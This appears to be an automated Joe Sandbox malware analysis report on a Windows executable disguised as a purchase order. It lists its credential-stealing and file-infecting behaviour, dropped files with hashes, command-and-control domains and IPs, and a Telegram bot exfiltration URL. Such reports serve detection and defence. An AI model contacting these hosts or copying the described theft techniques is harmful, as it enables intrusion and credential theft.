functionality to behave differently if execute on a Russian/Kazak computer 16->109 signatures6 process7 dnsIp8 67 vjaxhpbji.biz 82.112.184.197, 49806, 49808, 49852 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 18->67 69 reallyfreegeoip.org 104.21.67.152, 443, 49725, 49759 CLOUDFLARENETUS United States 18->69 71 4 other IPs or domains 18->71 43 C:\Windows\System32\wbengine.exe, PE32+ 18->43 dropped 45 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 18->45 dropped 47 C:\Windows\System32\vds.exe, PE32+ 18->47 dropped 49 150 other malicious files 18->49 dropped 83 Tries to steal Mail credentials (via file / registry access) 18->83 85 Drops executable to a common third party application directory 18->85 87 Infects executable files (exe, dll, sys, html) 18->87 89 Loading BitLocker PowerShell Module 23->89 33 conhost.exe 23->33         started        35 WmiPrvSE.exe 23->35         started        37 conhost.exe 25->37         started        39 conhost.exe 27->39         started        91 Tries to harvest and steal browser information (history, passwords, etc) 29->91 41 conhost.exe 31->41         started        file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  RFQ_PO N89397-GM7287-Order.bat.exe29%ReversingLabs
                  RFQ_PO N89397-GM7287-Order.bat.exe100%AviraHEUR/AGEN.1305452
                  RFQ_PO N89397-GM7287-Order.bat.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  przvgke.biz
                  		172.234.222.138
                  		truetrue
                    lpuegx.biz
                    		82.112.184.197
                    		truetrue
                      ssbzmoy.biz
                      		18.141.10.107
                      		truefalse
                        vjaxhpbji.biz
                        		82.112.184.197
                        		truetrue
                          xlfhhhm.biz
                          		47.129.31.212
                          		truefalse
                            reallyfreegeoip.org
                            		104.21.67.152
                            		truetrue
                              vcddkls.biz
                              		18.141.10.107
                              		truefalse
                                s-part-0035.t-0009.t-msedge.net
                                		13.107.246.63
                                		truefalse
                                  checkip.dyndns.com
                                  		132.226.247.73
                                  		truefalse
                                    zlenh.biz
                                    		unknown
                                    		unknowntrue
                                      checkip.dyndns.org
                                      		unknown
                                      		unknowntrue
                                        knjghuig.biz
                                        		unknown
                                        		unknowntrue
                                          pywolwnvd.biz
                                          		unknown
                                          		unknowntrue
                                            ifsaia.biz
                                            		unknown
                                            		unknowntrue
                                              uhxqin.biz
                                              		unknown
                                              		unknowntrue
                                                time.windows.com
                                                		unknown
                                                		unknowntrue
                                                  cvgrf.biz
                                                  		unknown
                                                  		unknowntrue
                                                    saytjshyf.biz
                                                    		unknown
                                                    		unknowntrue
                                                      npukfztj.biz
                                                      		unknown
                                                      		unknowntrue
                                                        anpmnmxo.biz
                                                        		unknown
                                                        		unknowntrue

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://ssbzmoy.biz/jfalse
                                                            http://lpuegx.biz/oxlmrobhjtrue
                                                              http://przvgke.biz/lkgggwxhtrue
                                                                http://vjaxhpbji.biz/fmyrcucxukodtrue
                                                                  http://checkip.dyndns.org/false
                                                                    http://przvgke.biz/hndiufmaksetrue
                                                                      http://lpuegx.biz/kpnskvgbtrue
                                                                        https://reallyfreegeoip.org/xml/8.46.123.228false
                                                                          http://vjaxhpbji.biz/prgqqrrnmmetmtrue
                                                                            http://przvgke.biz/hcvpcbtrue
                                                                              http://lpuegx.biz/lsfncqfqtrue
                                                                                http://przvgke.biz/lxdatrue
                                                                                  http://vjaxhpbji.biz/oitulotrue
                                                                                    http://lpuegx.biz/algtvyjtrue
                                                                                      http://vjaxhpbji.biz/rdltrue
                                                                                        http://xlfhhhm.biz/agmjdfalse

                                                                                          URLs from Memory and Binaries

                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                          http://xlfhhhm.biz/vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://api.telegram.org/botvbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://tempuri.org/DataSet1.xsdalg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                http://82.112.184.197:80/lsfncqfqvbc.exe, 00000009.00000002.2747734535.0000000009D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  http://172.234.222.138/lkgggwxhalg.exe, 0000000B.00000003.1672024294.000000000051E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750326950.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://18.141.10.107/alg.exe, 0000000B.00000003.1524192545.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      http://172.234.222.138:80/lkgggwxhalg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://checkip.dyndns.org/hvbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          http://47.129.31.212/vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://checkip.dyndns.org/pvbc.exe, 00000009.00000002.2696625029.00000000077F6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://checkip.dyndns.vbc.exe, 00000009.00000002.2696625029.00000000077FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                http://reallyfreegeoip.orgvbc.exe, 00000009.00000002.2696625029.0000000007892000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://checkip.dyndns.Pvbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    http://82.112.184.197:80/algtvyjalg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://reallyfreegeoip.orgLL(vbc.exe, 0000002A.00000002.2671075234.0000000007779000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        http://checkip.dyndns.comvbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1420209472.0000000003493000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.000000000777C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007849000.00000004.00000800.00020000.00000000.sdmp, YRtQgzFlDnVSru.exe, 00000016.00000002.1552755563.0000000002689000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            http://47.129.31.212/agmjdvbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2747734535.0000000009D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://47.129.31.212:80/agmjdrrnmmetm0vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://18.141.10.107/jqjvbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://reallyfreegeoip.org8vbc.exe, 00000009.00000002.2696625029.00000000077A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://checkip.dyndnvbc.exe, 00000009.00000002.2696625029.0000000007861000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://reallyfreegeoip.org/xml/vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        http://82.112.184.197/fmyrcucxukodvbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://82.112.184.197:80/fmyrcucxukodvbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://82.112.184.197/algtvyjJalg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://47.129.31.212/Hvbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://82.112.184.197/oxlmrobhjvbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://checkip.dyndns.orgvbc.exe, 00000009.00000002.2696625029.0000000007861000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007831000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    http://47.129.31.212/Svbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://82.112.184.197/lsfncqfqvbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://82.112.184.197:80/oxlmrobhjvbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://18.141.10.107/jvbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://reallyfreegeoip.org/xml/8.46.123.228lvbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://reallyfreegeoip.orgvbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                http://www.winimage.com/zLibDllSingleClientServicesUpdater.exe.9.drfalse
                                                                                                                                                                  http://47.129.31.212/7vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    104.21.67.152
                                                                                                                                                                    		reallyfreegeoip.orgUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                    47.129.31.212
                                                                                                                                                                    		xlfhhhm.bizCanada
                                                                                                                                                                    		34533ESAMARA-ASRUfalse
                                                                                                                                                                    172.234.222.138
                                                                                                                                                                    		przvgke.bizUnited States
                                                                                                                                                                    		20940AKAMAI-ASN1EUtrue
                                                                                                                                                                    82.112.184.197
                                                                                                                                                                    		lpuegx.bizRussian Federation
                                                                                                                                                                    		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                    18.141.10.107
                                                                                                                                                                    		ssbzmoy.bizUnited States
                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                    132.226.247.73
                                                                                                                                                                    		checkip.dyndns.comUnited States
                                                                                                                                                                    		16989UTMEMUSfalse

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                    Analysis ID:1564874
                                                                                                                                                                    Start date and time:2024-11-28 22:43:11 +01:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 14m 10s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:44
                                                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.spre.troj.spyw.expl.evad.winEXE@36/178@44/6
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 77%
                                                                                                                                                                    • Number of executed functions: 327
                                                                                                                                                                    • Number of non-executed functions: 34
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, SearchIndexer.exe, SearchProtocolHost.exe, WMIADAP.exe, conhost.exe, WmiApSrv.exe, svchost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.81.94.65
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                    • VT rate limit hit for: RFQ_PO N89397-GM7287-Order.bat.exe

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    16:44:21API Interceptor2x Sleep call for process: RFQ_PO N89397-GM7287-Order.bat.exe modified
                                                                                                                                                                    16:44:24API Interceptor59x Sleep call for process: powershell.exe modified
                                                                                                                                                                    16:44:33API Interceptor2x Sleep call for process: YRtQgzFlDnVSru.exe modified
                                                                                                                                                                    16:44:37API Interceptor147848x Sleep call for process: vbc.exe modified
                                                                                                                                                                    16:44:38API Interceptor6x Sleep call for process: alg.exe modified
                                                                                                                                                                    16:45:03API Interceptor201x Sleep call for process: msdtc.exe modified
                                                                                                                                                                    22:44:27Task SchedulerRun new task: YRtQgzFlDnVSru path: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    No context

                                                                                                                                                                    Domains

                                                                                                                                                                    No context

                                                                                                                                                                    ASNs

                                                                                                                                                                    No context

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1353216
                                                                                                                                                                    Entropy (8bit):5.324397429350343
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:CC4VQjGARQNhiZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:COCAR0iZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4C2E41161011A81854254AC402555CE9
                                                                                                                                                                    SHA1:B154E1F0100D20AC92090BF59BBE9BA8CAFCACEC
                                                                                                                                                                    SHA-256:755BDDA862DC1A40B5A03B77713FEA60B30A2A321AF545DA6A290635E0993EF2
                                                                                                                                                                    SHA-512:C1572A3556795B022E18DA8853E09A22A4A1CFBAC4B9C9B2714195C5B6A0284F7723D5FFAFA02FD6FA14E698AD859DB205886359992739B0BD6D6645FCA3E485
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1294848
                                                                                                                                                                    Entropy (8bit):5.282713099627815
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:FNUpaKghiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FCMKgwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:68FF6ADCBB0A75357688BBD0E1FAB7B3
                                                                                                                                                                    SHA1:E08F38FE20D41B58ACBA3AC6F63391238F513DDC
                                                                                                                                                                    SHA-256:158C13A11DBFDF4DB6684B751081BF01B0F26ECDC8E61C0BB5CBCE8E3AC1050A
                                                                                                                                                                    SHA-512:0AD72EF583D5E0635EC696CA41C6CD48AA016957A733EBAE0FD1D8FE85E7D266602DB65C7EFD0F6676C60E63D7AA1EC6FE432CAEE9F69A435708203E0A5B55D4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....qJ......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1314304
                                                                                                                                                                    Entropy (8bit):5.274145322413067
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:bMEhwdbTdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tKdHdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:C22221643AD1A9C42F54E6D057D51A24
                                                                                                                                                                    SHA1:3B278E755089DC18F8FDE4F0377A4DF86753B8AB
                                                                                                                                                                    SHA-256:22879248AD33B21703BEA40BB629B3A7B6A0163DE210853076FB13796E1A686A
